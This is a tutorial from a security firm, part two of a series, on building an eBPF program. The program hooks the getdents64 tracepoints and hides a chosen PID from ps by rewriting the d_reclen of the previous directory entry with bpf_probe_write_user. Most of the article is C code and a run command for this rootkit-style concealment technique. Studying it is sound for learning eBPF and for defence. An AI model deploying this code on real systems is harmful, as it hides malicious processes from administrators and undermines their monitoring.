This article is a tutorial on how to create an eBPF program using a tracepoint.
If you are not familiar with eBPF, please refer to our introduction to eBPF, or to the official documentation.
To get the most out of this article, we recommend reading part 1 first, which details the methodology used to conceal a PID.

In practice, how do you hide a PID from a user?

Note: This article is also available in French 🇫🇷

Aim

In this article, we’ll take a look at how eBPF works, using a practical example. We’ll try to hide a process identifier (PID) from a user. The previous article introduces the concepts surrounding the use of tracepoints in an eBPF program and the operation of the getdents64 syscall. This second part focuses mainly on the creation of code to conceal a PID.
The code we’ll be looking at is a revised version of the bad-bpf project presented by Patrick H. at DEF CON 29 in 2021. You’ll find the complete code on the Acceis repository.

The aim of this article is to provide a practical understanding of how to create an eBPF program capable of hiding a program’s PID on Linux systems.
This article focuses on the program backend to highlight how the PID is masked within the kernel, without going into detail about how the program is loaded into the kernel.

Summary of part 1

The previous article showed that the ps command is similar to ls /proc, and explained how the getdents64 system call works and how it can be used to hide a directory. The caller allocates a buffer in user space and passes it as a parameter to the system call, which fills it in when the call is executed. On return, this buffer contains one entry of type struct linux_dirent64 per element read from the directory.
To hide a PID, iterate over this buffer and then delete the corresponding entry.

To walk a buffer whose entries have different sizes, you iterate by byte offset: start from the buffer’s starting address and keep a "position" that is advanced at each iteration by the size of the current element. For linux_dirent64, this size is stored in the d_reclen field. Adding d_reclen to the current position therefore gives the address of the next entry.

To hide an entry in the buffer, the simplest approach is to extend the length of the previous dirent (the value of its d_reclen) so that it covers both its own length and the length of the dirent we wish to hide. A reader that walks the buffer then jumps straight from the previous dirent to the one after the hidden dirent, which makes the hidden entry "invisible".
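To make the two mechanisms above concrete, here is a minimal user-space sketch in C. It does not call getdents64: it builds a small buffer by hand, using demo_dirent as a hypothetical stand-in for struct linux_dirent64. All demo_* names are illustrative and do not come from the project. demo_walk iterates using d_reclen, and demo_hide merges the target entry into the previous one.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-in for struct linux_dirent64 (same field order). */
struct demo_dirent {
    uint64_t d_ino;
    int64_t  d_off;
    uint16_t d_reclen;  /* size of this record in bytes */
    uint8_t  d_type;
    char     d_name[];  /* NUL-terminated name */
};

#define RECLEN_OFF offsetof(struct demo_dirent, d_reclen)
#define NAME_OFF   offsetof(struct demo_dirent, d_name)

/* Append a record for `name` at offset `pos`; returns the new end offset. */
static size_t demo_append(unsigned char *buf, size_t pos, const char *name)
{
    /* Header + name + NUL, rounded up to a multiple of 8 bytes. */
    uint16_t reclen = (uint16_t)((NAME_OFF + strlen(name) + 1 + 7) & ~(size_t)7);
    memset(buf + pos, 0, reclen);
    memcpy(buf + pos + RECLEN_OFF, &reclen, sizeof(reclen));
    memcpy(buf + pos + NAME_OFF, name, strlen(name) + 1);
    return pos + reclen;
}

/* Copy d_reclen out of the record that starts at `pos`. */
static uint16_t demo_reclen(const unsigned char *buf, size_t pos)
{
    uint16_t reclen;
    memcpy(&reclen, buf + pos + RECLEN_OFF, sizeof(reclen));
    return reclen;
}

/* Count the records a reader sees; *found is set to 1 if `name` is one of them. */
static int demo_walk(const unsigned char *buf, size_t size, const char *name, int *found)
{
    int count = 0;
    size_t bpos = 0;
    *found = 0;
    while (bpos < size) {
        uint16_t cur = demo_reclen(buf, bpos);
        if (cur == 0)
            break;                      /* malformed record: stop */
        if (strcmp((const char *)buf + bpos + NAME_OFF, name) == 0)
            *found = 1;
        count++;
        bpos += cur;                    /* jump to the next record */
    }
    return count;
}

/* Hide `name` by adding its d_reclen to the previous record's d_reclen. */
static int demo_hide(unsigned char *buf, size_t size, const char *name)
{
    size_t bpos = 0;
    uint16_t prev = 0;                  /* d_reclen of the previous record */
    while (bpos < size) {
        uint16_t cur = demo_reclen(buf, bpos);
        if (cur == 0)
            break;
        if (strcmp((const char *)buf + bpos + NAME_OFF, name) == 0) {
            if (prev == 0)
                return 0;               /* first record: no predecessor to extend */
            uint16_t merged = (uint16_t)(prev + cur);
            memcpy(buf + bpos - prev + RECLEN_OFF, &merged, sizeof(merged));
            return 1;
        }
        prev = cur;
        bpos += cur;
    }
    return 0;
}
```

In this sketch, hiding "1337" in a buffer that contains ".", "1337" and "self" leaves a reader with two visible entries. The first entry cannot be hidden this way because it has no predecessor. In /proc this is rarely a concern, since the listing usually starts with "." and "..".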

Program initialization

To automate the injection of eBPF programs into the kernel, you can use the ebpf-go library for Go programs. The application’s frontend is written in Go and uses this library. The Go code runs in user space and loads the eBPF code, which is written in C and compiled beforehand, into the kernel.
The frontend is therefore distinct from the eBPF programs it injects, and does not share the same memory space.

To keep things simple on the application front end, the eBPF code is injected using this library and is presented as follows:

func hideDir(dirname string) {
  bpfManager, err := BootstrapBPF(dirname)
  if err != nil {
    log.Fatalf("Failed to bootstrap BPF: %v", err)
  }
  bpfManager.handlePerfEvent()
  bpfManager.waitUntilExitCall()
}
  • BootstrapBPF initializes the eBPF programs, with dirname being the name of the directory (or the PID) to be masked. It injects the two eBPF programs attached to sys_enter_getdents64 and sys_exit_getdents64.
  • bpfManager.handlePerfEvent() creates a goroutine that waits for events returned by the eBPF program and prints them to the console in user space.
  • bpfManager.waitUntilExitCall() blocks until the program receives a stop signal, then terminates it.

Let’s not dwell on this frontend any further. All the logic for hiding a PID is to be found in the C backend.

When the tool is launched, the user passes the PID (or directory name) to be hidden (e.g. sudo ./bin/hide-dir 1337). This value is written to an eBPF map, which the eBPF programs read each time they are triggered.

Definition of maps

To move data between eBPF programs, or between user space and kernel space, the kernel provides maps: key/value stores that can be accessed from both contexts. There are different types of map for different needs.

For this project, three maps are required:

struct {
  __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
  __type(key, u32);
  __type(value, u32);
} rb SEC(".maps");

struct {
  __uint(type, BPF_MAP_TYPE_HASH);
  __uint(max_entries, 10);
  __type(key, u32);
  __type(value, u64);
} map_dirent SEC(".maps");

struct {
  __uint(type, BPF_MAP_TYPE_ARRAY);
  __uint(max_entries, 1);
  __type(key, u32);
  __type(value, struct userspace_data);
} map_store_dirname SEC(".maps");
  • The map named rb is used to send events to user space. Despite its name, it is declared as BPF_MAP_TYPE_PERF_EVENT_ARRAY, i.e. a perf event array (one perf buffer per CPU) rather than a BPF ring buffer (BPF_MAP_TYPE_RINGBUF). More information can be found in the dedicated documentation.
  • map_dirent stores the address of the buffer that receives the directory entries (linux_dirent64), keyed by the PID of the calling process. This is a hashmap type map (key/value).
  • map_store_dirname is the map used to retrieve the PID (or directory name) defined by the user. This is an array map. In our case, we only need one entry in this array to hide one directory at a time.

You can find full information on maps in the kernel documentation.

Types such as u8, u16, u32 and u64 are provided in the vmlinux.h file. They are fixed-width integer types, which guarantees consistent data sizes across different architectures. Their sizes are fixed when the program is compiled to BPF bytecode, not when it is loaded into the kernel.

Retrieving the buffer containing directory entries

As stated in part 1, to hide our PID, we need to get hold of the buffer containing all directory entries. At sys_enter_getdents64 this buffer has not been filled yet, since this attachment point is reached before the syscall is executed. Its address is already known, however, so we save it for later.

SEC("tp/syscalls/sys_enter_getdents64")
int handle_getdents_enter(struct trace_event_raw_sys_enter *ctx)
{
  u32 pid = bpf_get_current_pid_tgid() >> 32;

  u64 dirents_buf = ctx->args[1];
  bpf_map_update_elem(&map_dirent, &pid, &dirents_buf, BPF_ANY);
  return 0;
}

The above code saves the address of the buffer in the map. The pid variable identifies the current process and is used as the key for the map_dirent hashmap: the upper 32 bits of the value returned by bpf_get_current_pid_tgid() hold the thread group ID, which is what user space calls the PID. You need a value tied to the calling process so that the exit handler retrieves the buffer saved by the matching enter handler, and the pid lends itself well to this.
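As a small illustration of the shift used above, the following user-space sketch splits a 64-bit value laid out like the return value of bpf_get_current_pid_tgid(). The demo_tgid and demo_tid helpers are hypothetical names introduced for this example only.

```c
#include <stdint.h>

/* Upper 32 bits: thread group ID, i.e. the PID as seen from user space. */
static uint32_t demo_tgid(uint64_t pid_tgid)
{
    return (uint32_t)(pid_tgid >> 32);
}

/* Lower 32 bits: ID of the individual thread (kernel task). */
static uint32_t demo_tid(uint64_t pid_tgid)
{
    return (uint32_t)pid_tgid;
}
```

Because the key is the thread group ID, two threads of the same process calling getdents64 at the same time would share a single map entry. This is a limitation worth keeping in mind when reusing the approach.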

ctx->args is an array containing the syscall parameters. In the case of sys_enter_getdents64, ctx->args[1] refers to a struct linux_dirent64 * which is a buffer containing the various directory entries.
Thanks to the helper bpf_map_update_elem, the buffer is stored in the map for later use.

  • The elements of ctx->args are the parameters defined by the user during the system call. This means that they come from user space and therefore do not share the same memory as eBPF programs. This is important information for what follows.
  • dirents_buf does not point to an array of fixed-size elements, so it cannot be indexed like a conventional array (e.g. dirents_buf[1]). However, the linux_dirent64 structures follow one another in memory, so the next entry can be reached by adding the length of the current structure to its address.

The next step is to retrieve the buffer from sys_exit_getdents64, check whether our PID is present in the directory list, and if so, delete it.

As a reminder, ps is actually similar to ls /proc.

Extracting the filled buffer and the directory to be hidden

SEC("tp/syscalls/sys_exit_getdents64")
int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx)
{
  u64 pid = bpf_get_current_pid_tgid() >> 32;

  u64 * dirents_buf = get_dirent_buf(&pid);
  struct userspace_data * userspace_data = get_userspace_data();

  if (!dirents_buf || !userspace_data) return 0;
  ...
  return 0;
}

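The above code retrieves the buffer address previously stored in map_dirent using get_dirent_buf. The key is the pid, which is passed as a parameter to the function whose code is shown below. Note that pid is declared here as a u64 while map_dirent uses a u32 key: the lookup only reads the first four bytes of the key, which hold the PID on little-endian machines, but declaring it as a u32, as in the enter handler, would be more robust.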

u64 * get_dirent_buf(u64 * pid) {
  return (u64*)bpf_map_lookup_elem(&map_dirent, pid);
}

Once the buffer has been retrieved, we need to obtain the name of the directory to be hidden, as defined by the user when the program is launched. The get_userspace_data function is used, in the same way as get_dirent_buf, to extract this data from the map_store_dirname map. The returned structure contains the file name as a string and its size.

struct userspace_data {
  u8 dirname_to_hide[MAX_NAME_LEN];
  int dirname_len;
};
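To illustrate how the two fields of this structure relate, here is a user-space sketch in C of how such a structure could be filled from a command-line argument. It is not the project's frontend, which is written in Go. DEMO_MAX_NAME_LEN, demo_userspace_data and demo_fill are hypothetical names, the value 100 is an assumption, and dirname_len is assumed to exclude the terminating null byte.

```c
#include <stdint.h>
#include <string.h>

/* Assumed value: the project defines its own MAX_NAME_LEN. */
#define DEMO_MAX_NAME_LEN 100

/* Same layout as the userspace_data structure shown above. */
struct demo_userspace_data {
    uint8_t dirname_to_hide[DEMO_MAX_NAME_LEN];
    int dirname_len;   /* assumed to exclude the trailing NUL */
};

/* Returns 0 on success, -1 if the name is empty or does not fit. */
static int demo_fill(struct demo_userspace_data *out, const char *name)
{
    size_t len = strlen(name);
    if (len == 0 || len >= DEMO_MAX_NAME_LEN)
        return -1;
    memset(out, 0, sizeof(*out));          /* zero padding keeps the name NUL-terminated */
    memcpy(out->dirname_to_hide, name, len);
    out->dirname_len = (int)len;
    return 0;
}
```

Storing the length alongside the name means the eBPF side does not have to search for the end of the string on every getdents64 call.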

If the data is not present in the maps, the lookup functions return a NULL pointer. Both results must therefore be checked before going any further, and the program simply returns if either is missing.

if (!dirents_buf || !userspace_data) return 0;

This check is not optional: the verifier refuses to load a program that dereferences the result of a map lookup without first testing it for NULL, as this could compromise the kernel’s security or proper operation.

The buffer patch

Global view

Now that our dirents_buf buffer has been populated with all the entries in the current directory (linux_dirent64), all that remains is to loop over each entry, then test whether any of them correspond to the directory we wish to hide.

SEC("tp/syscalls/sys_exit_getdents64")
int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx)
{
  ...
  struct dirents_data_t dirents_data = {
    .bpos = 0,
    .userspace_data = userspace_data,
    .dirents_buf = dirents_buf,
    .buff_size = ctx->ret,
    .d_reclen = 0,
    .d_reclen_prev = 0,
    .patch_succeded = false,
  };

  bpf_loop(MAX_DIRENTS, patch_dirent_if_found, &dirents_data, 0);
  ...
  return 0;
}

Since the buffer is not an array of known size, you need to define the progress position at each iteration to know exactly which structure is being analyzed. bpos represents this progress position in the buffer (bpos stands for buffer position).

The helper function bpf_loop calls a callback function, here patch_dirent_if_found, at most MAX_DIRENTS times (here set to 10000). The callback returns 0 to continue with the next iteration or 1 to stop the loop early.
The callback patch_dirent_if_found takes as parameters the current index and a pointer to data of any type (in this case, dirents_data).
The aim is to share state between iterations, so that each one can locate the current dirent from the bpos position left by the previous one. Through the dirents_data_t structure, each iteration has access to:
  • the buffer, the current position in it and its size;
  • the information about the directory to be masked, as defined by the user;
  • the sizes of the current and previous dirent (d_reclen and d_reclen_prev);
  • a flag, patch_succeded, that indicates whether the patch has been successful.
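The control flow of bpf_loop can be modelled in user space. The sketch below is not the kernel implementation: demo_loop, demo_state and demo_cb are hypothetical names, and the real helper takes an additional flags argument. It only illustrates the contract the callback relies on: the callback receives the index and a shared context pointer, and a non-zero return value stops the loop.

```c
#include <stdint.h>

typedef long (*demo_loop_cb)(uint32_t index, void *ctx);

/* User-space model of bpf_loop: calls cb at most nr_loops times and
 * returns the number of iterations actually performed. */
static long demo_loop(uint32_t nr_loops, demo_loop_cb cb, void *ctx)
{
    uint32_t i;
    for (i = 0; i < nr_loops; i++) {
        if (cb(i, ctx))
            return (long)i + 1;   /* callback asked to stop */
    }
    return (long)i;
}

/* Shared state, playing the role of dirents_data in the article. */
struct demo_state {
    int calls;          /* how many times the callback ran */
    uint32_t stop_at;   /* index at which the callback stops the loop */
};

static long demo_cb(uint32_t index, void *ctx)
{
    struct demo_state *s = ctx;
    s->calls++;
    return index == s->stop_at ? 1 : 0;
}
```

With an upper bound of 10000 and a callback that stops at index 4, only five iterations run. This is why a generous MAX_DIRENTS costs little as long as the callback returns 1 once the end of the buffer is reached.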

At the heart of patching

Understanding the patching process

Before going into the details of how the patch is made, we need to find an effective strategy for finding exactly which dirent corresponds to the directory to be masked.
The solution implemented is to extract the directory name dirent->d_name from the linux_dirent64 structure and compare each character with that of the file to be masked. In other words, a loop that iterates as many times as there are letters in d_name and compares each of the letters with those defined by the user.

Another option would have been to compare the memory of the two variables d_name and dirname_to_hide after making sure they had the same size. LLVM provides __builtin_memcmp for this, but depending on the compiler version and the sizes involved it may be lowered to a call to the external memcmp function. As eBPF programs cannot call external libraries, such a program would be rejected when loading into the kernel.

Preparing the patch

The loop is given a fixed upper bound (MAX_DIRENTS): the number of entries in the buffer is not known in advance, and the verifier must be guaranteed that the loop terminates. As the amount of data in the dirents_buf buffer varies from one directory to another, it is essential to exit the loop as soon as the end of the buffer is reached.

int patch_dirent_if_found(u32 _, struct dirents_data_t *data)
{
  if(is_end_of_buff(data->bpos, data->buff_size)) return 1;

  u8 dirname[MAX_NAME_LEN];
  struct linux_dirent64 * dirent = get_dirent(*data->dirents_buf, data->bpos);
  ...
  return 0;
}

is_end_of_buff checks whether the position has reached or passed the end of the data written to the buffer (buff_size, i.e. the return value of the syscall). The aim is to avoid reading past the end when retrieving dirent.
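The body of is_end_of_buff is not shown in this article. A minimal sketch of such a check, under the assumption that it is a plain comparison, could look like this (demo_is_end_of_buff is a hypothetical name):

```c
#include <stdbool.h>

/* True when there is no further record to read at bpos.
 * buff_size is the syscall return value: the number of bytes written,
 * 0 at the end of the directory, or a negative errno on failure. */
static bool demo_is_end_of_buff(long bpos, long buff_size)
{
    return bpos >= buff_size;
}
```

Using >= rather than > means the loop stops exactly at the end of the data. It also covers the cases where the syscall returned 0 or an error, since bpos starts at 0.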

Here’s the code used to retrieve the current dirent entry:

struct linux_dirent64 * get_dirent(u64 dirents_buf, int bpos) {
  return (struct linux_dirent64 *)(dirents_buf + bpos);
}

The function takes dirents_buf, the 64-bit user-space address of the buffer, as a parameter. The dirent records are contiguous in memory, so you only need to know the length of the first to obtain the address of the second, and so on. This is the role of bpos.

Before comparing the name of the current directory with the one to be hidden, we need to determine the length of the current dirent and its name.

int patch_dirent_if_found(u32 _, struct dirents_data_t *data)
{
  ...
  read_user__reclen(&data->d_reclen, &dirent->d_reclen);
  read_user__dirname(dirname, dirent->d_name);

  struct userspace_data * userspace_data = data->userspace_data;
  ...
  return 0;
}

read_user__reclen and read_user__dirname are small wrappers written for this project to read data from user space safely. The dirents_buf buffer is a pointer to user space, which is a memory space distinct from that of the kernel, and an eBPF program is not allowed to dereference such a pointer directly. Instead, the kernel provides helpers (bpf_probe_read_user and bpf_probe_read_user_str) which copy the data into the program’s own memory and fail cleanly if the address is invalid. In this case, the aim is to copy dirent->d_reclen into data->d_reclen and to do the same for the name, into dirname. d_reclen is the size of the current dirent, which is used to calculate the position of the next dirent in the buffer.

Compare the name of the current directory with the one to be hidden

Once all this data has been correctly retrieved, the next step is to determine whether dirname and dirname_to_hide are identical.

To compare dirname and dirname_to_hide, a simple method is to compare them character by character. To do this, you first determine how many characters need to be tested, then loop up to this index.

int patch_dirent_if_found(u32 _, struct dirents_data_t *data)
{
  ...
  int max_str_len = get_str_max_len(userspace_data->dirname_to_hide, dirname, userspace_data->dirname_len);

  if (is_dirname_to_hide(max_str_len, dirname, userspace_data->dirname_to_hide)) {
    data->patch_succeded = remove_curr_dirent(data);
    return 1;
  }
  ...
}

max_str_len determines the number of characters to be tested, i.e. the number of characters present in dirname_to_hide.

is_dirname_to_hide compares the two strings dirname_to_hide and dirname.

bool is_dirname_to_hide(int max_str_len, u8 * dirname, u8 * dirname_to_hide) {
  int i = 0;
  for (; i < max_str_len; i++) {
    if (dirname[i] != dirname_to_hide[i]) return false;
  }
  return dirname[i] == 0x00;
}

The function returns false as soon as two characters differ. If the loop completes, one final check is needed, because the loop alone does not ensure that dirname and dirname_to_hide have the same length: with dirname = 12345 and dirname_to_hide = 123, the first three characters match even though the names differ. To rule this out, the function checks that the character of dirname that follows the compared characters is a null byte.

In C, a string is always followed by a zero byte (0x00) to mark the end.
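The prefix edge case can be checked in user space. The function below is a copy of is_dirname_to_hide using standard C types, renamed demo_is_dirname_to_hide to mark it as an illustration. The length is passed in directly, since get_str_max_len is not shown in this article.

```c
#include <stdbool.h>
#include <stdint.h>

/* Compares the first `len` characters, then requires dirname to end there.
 * dirname must have at least len + 1 readable bytes. */
static bool demo_is_dirname_to_hide(int len, const uint8_t *dirname,
                                    const uint8_t *dirname_to_hide)
{
    int i = 0;
    for (; i < len; i++) {
        if (dirname[i] != dirname_to_hide[i])
            return false;          /* first differing character */
    }
    return dirname[i] == 0x00;     /* rejects "12345" when hiding "123" */
}
```

Called with a length of 3 and dirname_to_hide set to "123", the function accepts "123" and rejects "12345", "124" and "12".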

If all characters match, patch buffer

To remove the dirent from the buffer, the simplest solution is to go back to the previous dirent and overwrite its d_reclen with its own value plus that of the dirent to be removed (i.e. new_d_reclen = previous_d_reclen + current_d_reclen). This way, a program that walks the buffer skips over the hidden dirent and never reads its contents.

data->patch_succeded = remove_curr_dirent(data);

Removing the dirent takes three steps.

bool remove_curr_dirent(struct dirents_data_t * data) {
  struct linux_dirent64 *dirent_previous = get_dirent(*data->dirents_buf, (data->bpos - data->d_reclen_prev));
  u16 d_reclen_new = data->d_reclen + data->d_reclen_prev;
  return bpf_probe_write_user(&dirent_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new)) == 0;
}

First, you need to locate the dirent from the previous iteration, then calculate its new length, and finally write this value into the buffer using the bpf_probe_write_user helper.

As a reminder, the dirents_buf buffer is a pointer to user space. So its value cannot be directly modified from the eBPF program. This is why you need to use the bpf_probe_write_user helper.

remove_curr_dirent returns a Boolean depending on the success or failure of the rewrite.

If the names do not match, increment bpos

If is_dirname_to_hide returns false, increment the position in the buffer so that the next iteration searches for the next dirent.

int patch_dirent_if_found(u32 _, struct dirents_data_t *data)
{
  ...
  if (is_dirname_to_hide(max_str_len, dirname, userspace_data->dirname_to_hide)) {
    ...
    return 1;
  }
  data->d_reclen_prev = data->d_reclen;
  data->bpos += data->d_reclen;
  return 0;
}

d_reclen_prev tracks the size of the previous dirent, so that its position in the buffer can be recovered when remove_curr_dirent is called.

Sending notification to the user

The bpf_loop loop ends once the entry has been patched or the end of the buffer has been reached. If a patch has been performed successfully, a notification can be sent.

SEC("tp/syscalls/sys_exit_getdents64")
int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx)
{
  ...
  if (dirents_data.patch_succeded) {
    notify_userspace(ctx, pid);
  }

  bpf_map_delete_elem(&map_dirent, &pid);
  return 0;
}

The notification is sent by the notify_userspace function through the rb perf event array defined earlier.

long notify_userspace(void *ctx, u64 pid) {
  struct rb_event e = {
    .overwrite_succed = true,
    .pid = pid,
  };
  bpf_get_current_comm(&e.command, sizeof(e.command));
  return bpf_perf_event_output(ctx, &rb, BPF_F_CURRENT_CPU, &e, sizeof(e));
}

The data sent back to user space is an rb_event structure, whose fields are chosen by the developer. In this case, it carries the PID of the process performing the syscall and the name of the command being executed.

And the result?

Once the project has been compiled, all that remains is to execute it.
For example, to mask PID 53745:

sudo ./bin/hide-pid 53745

Loading an eBPF program almost always requires administrator rights (root, or capabilities such as CAP_BPF on recent kernels), as the program runs inside the kernel.

In another terminal, we run the ps command to check whether the process is still listed.

ps -ef | grep 53745

We can now see that the PID is no longer present in the list.
A notification is then received by our frontend, since our dirent has been correctly patched, and a message is displayed in the console.

2024/01/31 21:33:29 Hiding "53745" for process "ps" (pid: 76778)

The full code is available on GitHub.

About the author

Article written by Tristan d’Audibert aka Sathi, cybersecurity engineer apprentice at ACCEIS.